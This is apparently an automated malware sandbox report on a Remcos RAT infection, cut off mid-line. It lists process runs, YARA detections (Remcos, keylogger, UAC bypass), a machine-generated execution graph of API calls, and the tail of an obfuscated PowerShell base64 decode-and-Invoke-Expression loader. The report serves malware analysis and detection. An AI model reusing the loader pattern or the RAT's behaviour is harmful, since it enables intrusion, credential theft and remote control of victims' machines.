sIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07';$escumar = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($maremma));Invoke-Expression $escumar
                                                                                                                                                                                  Imagebase:0x7ff788560000
                                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:2
                                                                                                                                                                                  Start time:05:09:00
                                                                                                                                                                                  Start date:04/12/2024
                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:6
                                                                                                                                                                                  Start time:05:09:26
                                                                                                                                                                                  Start date:04/12/2024
                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                                                  Imagebase:0x130000
                                                                                                                                                                                  File size:262'432 bytes
                                                                                                                                                                                  MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:7
                                                                                                                                                                                  Start time:05:09:26
                                                                                                                                                                                  Start date:04/12/2024
                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                                                  Imagebase:0x870000
                                                                                                                                                                                  File size:262'432 bytes
                                                                                                                                                                                  MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.4122174513.0000000002A6F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.4120281726.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.4120281726.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                  • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:8
                                                                                                                                                                                  Start time:05:09:35
                                                                                                                                                                                  Start date:04/12/2024
                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\psbaiipwgpfutbdtwagt"
                                                                                                                                                                                  Imagebase:0x630000
                                                                                                                                                                                  File size:262'432 bytes
                                                                                                                                                                                  MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:9
                                                                                                                                                                                  Start time:05:09:35
                                                                                                                                                                                  Start date:04/12/2024
                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\rmosjaaquxxzehzxflbutck"
                                                                                                                                                                                  Imagebase:0x5d0000
                                                                                                                                                                                  File size:262'432 bytes
                                                                                                                                                                                  MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:10
                                                                                                                                                                                  Start time:05:09:35
                                                                                                                                                                                  Start date:04/12/2024
                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\bgtlktksifpmgonbwwooehfgzfy"
                                                                                                                                                                                  Imagebase:0x410000
                                                                                                                                                                                  File size:262'432 bytes
                                                                                                                                                                                  MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:11
                                                                                                                                                                                  Start time:05:09:36
                                                                                                                                                                                  Start date:04/12/2024
                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\bgtlktksifpmgonbwwooehfgzfy"
                                                                                                                                                                                  Imagebase:0xc30000
                                                                                                                                                                                  File size:262'432 bytes
                                                                                                                                                                                  MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Reset < >

                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                    Execution Coverage:5.3%
                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:3.8%
                                                                                                                                                                                    Signature Coverage:6.3%
                                                                                                                                                                                    Total number of Nodes:1833
                                                                                                                                                                                    Total number of Limit Nodes:73
                                                                                                                                                                                    execution_graph 51460 416122 51497 401d64 51460->51497 51462 41612d 51463 401d64 28 API calls 51462->51463 51464 416141 51463->51464 51502 41b687 51464->51502 51466 41614a 51467 401d64 28 API calls 51466->51467 51468 41615e 51467->51468 51506 41b61a CreateFileW 51468->51506 51471 401d64 28 API calls 51472 416186 51471->51472 51473 416199 51472->51473 51536 404cbf 51472->51536 51514 4027cb 51473->51514 51476 4161a5 51477 4027cb 28 API calls 51476->51477 51478 4161b1 51477->51478 51479 4027cb 28 API calls 51478->51479 51480 4161bb 51479->51480 51517 404468 51480->51517 51484 4161d4 51485 401eea 26 API calls 51484->51485 51486 4161dd 51485->51486 51487 401eea 26 API calls 51486->51487 51488 4161e9 51487->51488 51489 4161f2 51488->51489 51490 401eea 26 API calls 51488->51490 51540 401d8c 51489->51540 51490->51489 51492 4161fb 51493 401eea 26 API calls 51492->51493 51494 416207 51493->51494 51495 401eea 26 API calls 51494->51495 51496 416213 51495->51496 51498 401d6c 51497->51498 51499 401d74 51498->51499 51546 401fff 28 API calls 51498->51546 51499->51462 51503 41b693 51502->51503 51547 41b58f 51503->51547 51507 416170 51506->51507 51508 41b644 GetFileSize 51506->51508 51507->51471 51556 401e65 51508->51556 51510 41b658 51511 41b66a ReadFile 51510->51511 51512 41b677 51511->51512 51513 41b679 CloseHandle 51511->51513 51512->51513 51513->51507 51561 401e9b 51514->51561 51516 4027d9 51516->51476 51518 40447b 51517->51518 51570 404be8 51518->51570 51520 404490 ctype 51521 404507 WaitForSingleObject 51520->51521 51522 4044e7 51520->51522 51524 40451d 51521->51524 51523 4044f9 send 51522->51523 51525 404542 51523->51525 51574 42051a 56 API calls 51524->51574 51528 401eea 26 API calls 51525->51528 51527 404530 SetEvent 51527->51525 51529 40454a 51528->51529 51530 401eea 26 API calls 51529->51530 51531 404552 51530->51531 51532 401eea 51531->51532 51534 4021b9 51532->51534 51533 4021e8 51533->51484 51534->51533 51580 40262e 51534->51580 51537 404ccb 51536->51537 51588 402e78 51537->51588 51539 404cee 51539->51473 51542 40200a 51540->51542 51541 40203a 51541->51492 51542->51541 51597 402654 51542->51597 51544 40202b 51600 4026ba 26 API calls _Deallocate 51544->51600 51548 41b5a2 CreateFileW 51547->51548 51550 41b5df 51548->51550 51551 41b5db 51548->51551 51552 41b5f6 WriteFile 51550->51552 51553 41b5e6 SetFilePointer 51550->51553 51551->51466 51554 41b60b CloseHandle 51552->51554 51555 41b609 51552->51555 51553->51552 51553->51554 51554->51551 51555->51554 51557 401e6d 51556->51557 51558 401e77 51557->51558 51560 4023b7 28 API calls 51557->51560 51558->51510 51560->51558 51562 401ea7 51561->51562 51565 40245c 51562->51565 51564 401eb9 51564->51516 51566 402469 51565->51566 51568 402478 51566->51568 51569 402ad3 28 API calls 51566->51569 51568->51564 51569->51568 51571 404bf0 51570->51571 51575 404c0c 51571->51575 51573 404c06 51573->51520 51574->51527 51576 404c16 51575->51576 51578 404c21 51576->51578 51579 404d07 28 API calls 51576->51579 51578->51573 51579->51578 51583 402bee 51580->51583 51582 40263b 51582->51533 51584 402bfb 51583->51584 51585 402c08 error_info_injector 51583->51585 51587 4015d8 26 API calls _Deallocate 51584->51587 51585->51582 51587->51585 51589 402e85 51588->51589 51590 402e98 51589->51590 51592 402ea9 51589->51592 51593 402eae 51589->51593 51595 403445 28 API calls 51590->51595 51592->51539 51593->51592 51596 40225b 26 API calls 51593->51596 51595->51592 51596->51592 51601 402c1a 51597->51601 51600->51541 51604 403340 51601->51604 51605 403348 51604->51605 51606 402662 51605->51606 51608 4038c2 51605->51608 51606->51544 51611 4038cb 51608->51611 51612 401eea 26 API calls 51611->51612 51613 4038ca 51612->51613 51613->51605 51614 446f43 GetLastError 51615 446f5c 51614->51615 51616 446f62 51614->51616 51640 447466 11 API calls 2 library calls 51615->51640 51620 446fb9 SetLastError 51616->51620 51633 448706 51616->51633 51622 446fc2 51620->51622 51621 446f7c 51641 446ac5 51621->51641 51624 446f91 51624->51621 51626 446f98 51624->51626 51648 446d31 20 API calls _abort 51626->51648 51627 446f82 51629 446fb0 SetLastError 51627->51629 51629->51622 51630 446fa3 51631 446ac5 _free 17 API calls 51630->51631 51632 446fa9 51631->51632 51632->51620 51632->51629 51638 448713 _strftime 51633->51638 51634 448753 51650 445354 20 API calls _abort 51634->51650 51635 44873e RtlAllocateHeap 51636 446f74 51635->51636 51635->51638 51636->51621 51647 4474bc 11 API calls 2 library calls 51636->51647 51638->51634 51638->51635 51649 442200 7 API calls 2 library calls 51638->51649 51640->51616 51642 446ad0 RtlFreeHeap 51641->51642 51643 446af9 __dosmaperr 51641->51643 51642->51643 51644 446ae5 51642->51644 51643->51627 51651 445354 20 API calls _abort 51644->51651 51646 446aeb GetLastError 51646->51643 51647->51624 51648->51630 51649->51638 51650->51636 51651->51646 51652 1000c7a7 51653 1000c7be 51652->51653 51658 1000c82c 51652->51658 51653->51658 51664 1000c7e6 GetModuleHandleA 51653->51664 51654 1000c872 51655 1000c835 GetModuleHandleA 51657 1000c83f 51655->51657 51657->51658 51659 1000c85f GetProcAddress 51657->51659 51658->51654 51658->51655 51658->51657 51659->51658 51660 1000c7dd 51660->51657 51660->51658 51661 1000c800 GetProcAddress 51660->51661 51661->51658 51662 1000c80d VirtualProtect 51661->51662 51662->51658 51663 1000c81c VirtualProtect 51662->51663 51663->51658 51665 1000c7ef 51664->51665 51671 1000c82c 51664->51671 51676 1000c803 GetProcAddress 51665->51676 51667 1000c872 51668 1000c835 GetModuleHandleA 51673 1000c83f 51668->51673 51669 1000c7f4 51670 1000c800 GetProcAddress 51669->51670 51669->51671 51670->51671 51672 1000c80d VirtualProtect 51670->51672 51671->51667 51671->51668 51671->51673 51672->51671 51674 1000c81c VirtualProtect 51672->51674 51673->51671 51675 1000c85f GetProcAddress 51673->51675 51674->51671 51675->51671 51677 1000c82c 51676->51677 51678 1000c80d VirtualProtect 51676->51678 51680 1000c872 51677->51680 51681 1000c835 GetModuleHandleA 51677->51681 51678->51677 51679 1000c81c VirtualProtect 51678->51679 51679->51677 51683 1000c83f 51681->51683 51682 1000c85f GetProcAddress 51682->51683 51683->51677 51683->51682 51684 402bcc 51685 402bd7 51684->51685 51686 402bdf 51684->51686 51692 403315 51685->51692 51688 402beb 51686->51688 51701 4015d3 51686->51701 51693 4015d3 22 API calls 51692->51693 51694 40332a 51693->51694 51695 402bdd 51694->51695 51696 40333b 51694->51696 51711 43a7ac 26 API calls 3 library calls 51696->51711 51698 43a846 51712 43a854 11 API calls _abort 51698->51712 51700 43a853 51703 43360d 51701->51703 51704 402be9 51703->51704 51707 43362e std::_Facet_Register 51703->51707 51713 43a88c 51703->51713 51720 442200 7 API calls 2 library calls 51703->51720 51706 433dec std::_Facet_Register 51722 437bd7 RaiseException 51706->51722 51707->51706 51721 437bd7 RaiseException 51707->51721 51710 433e09 51711->51698 51712->51700 51718 446aff _strftime 51713->51718 51714 446b3d 51724 445354 20 API calls _abort 51714->51724 51715 446b28 RtlAllocateHeap 51717 446b3b 51715->51717 51715->51718 51717->51703 51718->51714 51718->51715 51723 442200 7 API calls 2 library calls 51718->51723 51720->51703 51721->51706 51722->51710 51723->51718 51724->51717 51725 41d4d0 51727 41d4e6 ctype ___scrt_fastfail 51725->51727 51726 41d6e3 51731 41d734 51726->51731 51741 41d071 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_fastfail 51726->51741 51727->51726 51729 431f99 21 API calls 51727->51729 51733 41d696 ___scrt_fastfail 51729->51733 51730 41d6f4 51730->51731 51732 41d760 51730->51732 51742 431f99 51730->51742 51732->51731 51750 41d474 21 API calls ___scrt_fastfail 51732->51750 51733->51731 51735 431f99 21 API calls 51733->51735 51739 41d6be ___scrt_fastfail 51735->51739 51737 41d72d ___scrt_fastfail 51737->51731 51747 43264f 51737->51747 51739->51731 51740 431f99 21 API calls 51739->51740 51740->51726 51741->51730 51743 431fa3 51742->51743 51744 431fa7 51742->51744 51743->51737 51745 43a88c ___crtLCMapStringA 21 API calls 51744->51745 51746 431fac 51745->51746 51746->51737 51751 43256f 51747->51751 51749 432657 51749->51732 51750->51731 51752 432588 51751->51752 51755 43257e 51751->51755 51753 431f99 21 API calls 51752->51753 51752->51755 51754 4325a9 51753->51754 51754->51755 51757 43293a CryptAcquireContextA 51754->51757 51755->51749 51758 432956 51757->51758 51759 43295b CryptGenRandom 51757->51759 51758->51755 51759->51758 51760 432970 CryptReleaseContext 51759->51760 51760->51758 51761 426030 51766 4260f7 recv 51761->51766 51767 44e8b6 51768 44e8c1 51767->51768 51769 44e8e9 51768->51769 51770 44e8da 51768->51770 51773 44e8f8 51769->51773 51789 455573 27 API calls 2 library calls 51769->51789 51788 445354 20 API calls _abort 51770->51788 51776 44b9be 51773->51776 51775 44e8df ___scrt_fastfail 51777 44b9d6 51776->51777 51778 44b9cb 51776->51778 51780 44b9de 51777->51780 51787 44b9e7 _strftime 51777->51787 51790 446aff 51778->51790 51781 446ac5 _free 20 API calls 51780->51781 51785 44b9d3 51781->51785 51782 44ba11 HeapReAlloc 51782->51785 51782->51787 51783 44b9ec 51797 445354 20 API calls _abort 51783->51797 51785->51775 51787->51782 51787->51783 51798 442200 7 API calls 2 library calls 51787->51798 51788->51775 51789->51773 51791 446b3d 51790->51791 51795 446b0d _strftime 51790->51795 51800 445354 20 API calls _abort 51791->51800 51792 446b28 RtlAllocateHeap 51794 446b3b 51792->51794 51792->51795 51794->51785 51795->51791 51795->51792 51799 442200 7 API calls 2 library calls 51795->51799 51797->51785 51798->51787 51799->51795 51800->51794 51801 426091 51806 42610e send 51801->51806 51807 425e56 51808 425e6b 51807->51808 51811 425f0b 51807->51811 51809 425f25 51808->51809 51810 425f5a 51808->51810 51808->51811 51812 425eb9 51808->51812 51813 425f77 51808->51813 51814 425f9e 51808->51814 51819 425eee 51808->51819 51835 424354 50 API calls ctype 51808->51835 51809->51810 51809->51811 51838 41f075 54 API calls 51809->51838 51810->51813 51839 424b7b 21 API calls 51810->51839 51812->51811 51812->51819 51836 41f075 54 API calls 51812->51836 51813->51811 51813->51814 51823 424f78 51813->51823 51814->51811 51840 4255c7 28 API calls 51814->51840 51819->51809 51819->51811 51837 424354 50 API calls ctype 51819->51837 51824 424f97 ___scrt_fastfail 51823->51824 51827 424fa6 51824->51827 51832 424fcb 51824->51832 51841 41e097 21 API calls 51824->51841 51825 424fab 51830 424fb4 51825->51830 51825->51832 51843 41cf6e 50 API calls 51825->51843 51827->51825 51827->51832 51842 41fad4 47 API calls 51827->51842 51830->51832 51844 424185 21 API calls 2 library calls 51830->51844 51832->51814 51833 42504e 51833->51832 51834 431f99 21 API calls 51833->51834 51834->51825 51835->51812 51836->51812 51837->51809 51838->51809 51839->51813 51840->51811 51841->51827 51842->51833 51843->51830 51844->51832 51845 4429fc 51846 442a05 51845->51846 51847 442a1e 51845->51847 51848 442a0d 51846->51848 51852 442a84 51846->51852 51850 442a15 51850->51848 51863 442d51 22 API calls 2 library calls 51850->51863 51853 442a90 51852->51853 51854 442a8d 51852->51854 51864 44e1be GetEnvironmentStringsW 51853->51864 51854->51850 51857 442a9d 51859 446ac5 _free 20 API calls 51857->51859 51860 442ad2 51859->51860 51860->51850 51861 442aa8 51862 446ac5 _free 20 API calls 51861->51862 51862->51857 51863->51847 51865 44e1d2 51864->51865 51866 442a97 51864->51866 51867 446aff _strftime 21 API calls 51865->51867 51866->51857 51871 442ba9 26 API calls 4 library calls 51866->51871 51868 44e1e6 ctype 51867->51868 51869 446ac5 _free 20 API calls 51868->51869 51870 44e200 FreeEnvironmentStringsW 51869->51870 51870->51866 51871->51861 51872 43a998 51875 43a9a4 _swprintf ___DestructExceptionObject 51872->51875 51873 43a9b2 51890 445354 20 API calls _abort 51873->51890 51875->51873 51878 43a9dc 51875->51878 51876 43a9b7 51891 43a827 26 API calls _Deallocate 51876->51891 51885 444acc EnterCriticalSection 51878->51885 51880 43a9e7 51886 43aa88 51880->51886 51883 43a9c2 __fread_nolock 51885->51880 51888 43aa96 51886->51888 51887 43a9f2 51892 43aa0f LeaveCriticalSection std::_Lockit::~_Lockit 51887->51892 51888->51887 51893 448416 39 API calls 2 library calls 51888->51893 51890->51876 51891->51883 51892->51883 51893->51888 51894 414dba 51909 41a51b 51894->51909 51896 414dc3 51919 401fbd 51896->51919 51899 404468 60 API calls 51900 414dde 51899->51900 51901 4161f2 51900->51901 51902 401eea 26 API calls 51900->51902 51903 401d8c 26 API calls 51901->51903 51902->51901 51904 4161fb 51903->51904 51905 401eea 26 API calls 51904->51905 51906 416207 51905->51906 51907 401eea 26 API calls 51906->51907 51908 416213 51907->51908 51910 41a529 51909->51910 51911 43a88c ___crtLCMapStringA 21 API calls 51910->51911 51912 41a533 InternetOpenW InternetOpenUrlW 51911->51912 51913 41a55c InternetReadFile 51912->51913 51916 41a57f 51913->51916 51915 41a5ac InternetCloseHandle InternetCloseHandle 51917 41a5be 51915->51917 51916->51913 51916->51915 51918 401eea 26 API calls 51916->51918 51923 401f86 51916->51923 51917->51896 51918->51916 51920 401fcc 51919->51920 51932 402501 51920->51932 51922 401fea 51922->51899 51924 401f8e 51923->51924 51927 402325 51924->51927 51926 401fa4 51926->51916 51928 40232f 51927->51928 51930 40233a 51928->51930 51931 40294a 28 API calls 51928->51931 51930->51926 51931->51930 51934 40250d 51932->51934 51933 40252b 51933->51922 51934->51933 51936 40261a 28 API calls 51934->51936 51936->51933 51937 4339be 51938 4339ca ___DestructExceptionObject 51937->51938 51969 4336b3 51938->51969 51940 4339d1 51941 433b24 51940->51941 51944 4339fb 51940->51944 52269 433b44 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 51941->52269 51943 433b2b 52270 4426be 28 API calls _abort 51943->52270 51954 433a3a ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 51944->51954 52263 4434d1 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 51944->52263 51946 433b31 52271 442670 28 API calls _abort 51946->52271 51949 433b39 51950 433a14 51951 433a1a 51950->51951 52264 443475 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 51950->52264 51953 433a9b 51980 433c5e 51953->51980 51954->51953 52265 43edf4 38 API calls 3 library calls 51954->52265 51963 433abd 51963->51943 51964 433ac1 51963->51964 51965 433aca 51964->51965 52267 442661 28 API calls _abort 51964->52267 52268 433842 13 API calls 2 library calls 51965->52268 51968 433ad2 51968->51951 51970 4336bc 51969->51970 52272 433e0a IsProcessorFeaturePresent 51970->52272 51972 4336c8 52273 4379ee 10 API calls 3 library calls 51972->52273 51974 4336cd 51979 4336d1 51974->51979 52274 44335e 51974->52274 51977 4336e8 51977->51940 51979->51940 52290 436050 51980->52290 51983 433aa1 51984 443422 51983->51984 52292 44ddc9 51984->52292 51986 44342b 51988 433aaa 51986->51988 52296 44e0d3 38 API calls 51986->52296 51989 40d767 51988->51989 52298 41bce3 LoadLibraryA GetProcAddress 51989->52298 51991 40d783 GetModuleFileNameW 52303 40e168 51991->52303 51993 40d79f 51994 401fbd 28 API calls 51993->51994 51995 40d7ae 51994->51995 51996 401fbd 28 API calls 51995->51996 51997 40d7bd 51996->51997 52318 41afc3 51997->52318 52001 40d7cf 52002 401d8c 26 API calls 52001->52002 52003 40d7d8 52002->52003 52004 40d835 52003->52004 52005 40d7eb 52003->52005 52006 401d64 28 API calls 52004->52006 52578 40e986 90 API calls 52005->52578 52008 40d845 52006->52008 52011 401d64 28 API calls 52008->52011 52009 40d7fd 52010 401d64 28 API calls 52009->52010 52013 40d809 52010->52013 52012 40d864 52011->52012 52014 404cbf 28 API calls 52012->52014 52579 40e937 68 API calls 52013->52579 52015 40d873 52014->52015 52343 405ce6 52015->52343 52018 40d87f 52346 401eef 52018->52346 52019 40d824 52580 40e155 68 API calls 52019->52580 52022 40d88b 52023 401eea 26 API calls 52022->52023 52024 40d894 52023->52024 52026 401eea 26 API calls 52024->52026 52025 401eea 26 API calls 52027 40dc9f 52025->52027 52028 40d89d 52026->52028 52266 433c94 GetModuleHandleW 52027->52266 52029 401d64 28 API calls 52028->52029 52030 40d8a6 52029->52030 52350 401ebd 52030->52350 52032 40d8b1 52033 401d64 28 API calls 52032->52033 52034 40d8ca 52033->52034 52035 401d64 28 API calls 52034->52035 52037 40d8e5 52035->52037 52036 40d946 52038 401d64 28 API calls 52036->52038 52053 40e134 52036->52053 52037->52036 52581 4085b4 52037->52581 52044 40d95d 52038->52044 52040 40d912 52041 401eef 26 API calls 52040->52041 52042 40d91e 52041->52042 52045 401eea 26 API calls 52042->52045 52043 40d9a4 52354 40bed7 52043->52354 52044->52043 52050 4124b7 3 API calls 52044->52050 52047 40d927 52045->52047 52585 4124b7 RegOpenKeyExA 52047->52585 52048 40d9aa 52049 40d82d 52048->52049 52357 41a463 52048->52357 52049->52025 52055 40d988 52050->52055 52673 412902 30 API calls 52053->52673 52054 40d9c5 52056 40da18 52054->52056 52374 40697b 52054->52374 52055->52043 52588 412902 30 API calls 52055->52588 52058 401d64 28 API calls 52056->52058 52061 40da21 52058->52061 52070 40da32 52061->52070 52071 40da2d 52061->52071 52063 40e14a 52674 4112b5 64 API calls ___scrt_fastfail 52063->52674 52064 40d9e4 52589 40699d 30 API calls 52064->52589 52065 40d9ee 52069 401d64 28 API calls 52065->52069 52078 40d9f7 52069->52078 52075 401d64 28 API calls 52070->52075 52592 4069ba CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 52071->52592 52072 40d9e9 52590 4064d0 97 API calls 52072->52590 52076 40da3b 52075->52076 52378 41ae08 52076->52378 52078->52056 52081 40da13 52078->52081 52079 40da46 52382 401e18 52079->52382 52591 4064d0 97 API calls 52081->52591 52082 40da51 52386 401e13 52082->52386 52085 40da5a 52086 401d64 28 API calls 52085->52086 52087 40da63 52086->52087 52088 401d64 28 API calls 52087->52088 52089 40da7d 52088->52089 52090 401d64 28 API calls 52089->52090 52091 40da97 52090->52091 52092 401d64 28 API calls 52091->52092 52094 40dab0 52092->52094 52093 40db1d 52096 40db2c 52093->52096 52101 40dcaa ___scrt_fastfail 52093->52101 52094->52093 52095 401d64 28 API calls 52094->52095 52100 40dac5 _wcslen 52095->52100 52097 40db35 52096->52097 52125 40dbb1 ___scrt_fastfail 52096->52125 52098 401d64 28 API calls 52097->52098 52099 40db3e 52098->52099 52102 401d64 28 API calls 52099->52102 52100->52093 52103 401d64 28 API calls 52100->52103 52652 41265d RegOpenKeyExA 52101->52652 52104 40db50 52102->52104 52105 40dae0 52103->52105 52107 401d64 28 API calls 52104->52107 52109 401d64 28 API calls 52105->52109 52108 40db62 52107->52108 52112 401d64 28 API calls 52108->52112 52110 40daf5 52109->52110 52593 40c89e 52110->52593 52111 40dcef 52113 401d64 28 API calls 52111->52113 52114 40db8b 52112->52114 52115 40dd16 52113->52115 52120 401d64 28 API calls 52114->52120 52400 401f66 52115->52400 52118 401e18 26 API calls 52119 40db14 52118->52119 52122 401e13 26 API calls 52119->52122 52123 40db9c 52120->52123 52122->52093 52650 40bc67 46 API calls _wcslen 52123->52650 52124 40dd25 52404 4126d2 RegCreateKeyA 52124->52404 52390 4128a2 52125->52390 52130 40dc45 ctype 52134 401d64 28 API calls 52130->52134 52131 40dbac 52131->52125 52132 401d64 28 API calls 52133 40dd47 52132->52133 52410 43a5e7 52133->52410 52135 40dc5c 52134->52135 52135->52111 52139 40dc70 52135->52139 52138 40dd5e 52655 41beb0 87 API calls ___scrt_fastfail 52138->52655 52140 401d64 28 API calls 52139->52140 52141 40dc7e 52140->52141 52145 41ae08 28 API calls 52141->52145 52143 40dd81 52144 401f66 28 API calls 52143->52144 52147 40dd96 52144->52147 52148 40dc87 52145->52148 52146 40dd65 CreateThread 52146->52143 53654 41c96f 10 API calls 52146->53654 52149 401f66 28 API calls 52147->52149 52651 40e219 119 API calls 52148->52651 52151 40dda5 52149->52151 52414 41a686 52151->52414 52152 40dc8c 52152->52111 52154 40dc93 52152->52154 52154->52049 52156 401d64 28 API calls 52157 40ddb6 52156->52157 52158 401d64 28 API calls 52157->52158 52159 40ddcb 52158->52159 52160 401d64 28 API calls 52159->52160 52161 40ddeb 52160->52161 52162 43a5e7 42 API calls 52161->52162 52163 40ddf8 52162->52163 52164 401d64 28 API calls 52163->52164 52165 40de03 52164->52165 52166 401d64 28 API calls 52165->52166 52167 40de14 52166->52167 52168 401d64 28 API calls 52167->52168 52169 40de29 52168->52169 52170 401d64 28 API calls 52169->52170 52171 40de3a 52170->52171 52172 40de41 StrToIntA 52171->52172 52438 409517 52172->52438 52175 401d64 28 API calls 52176 40de5c 52175->52176 52177 40dea1 52176->52177 52178 40de68 52176->52178 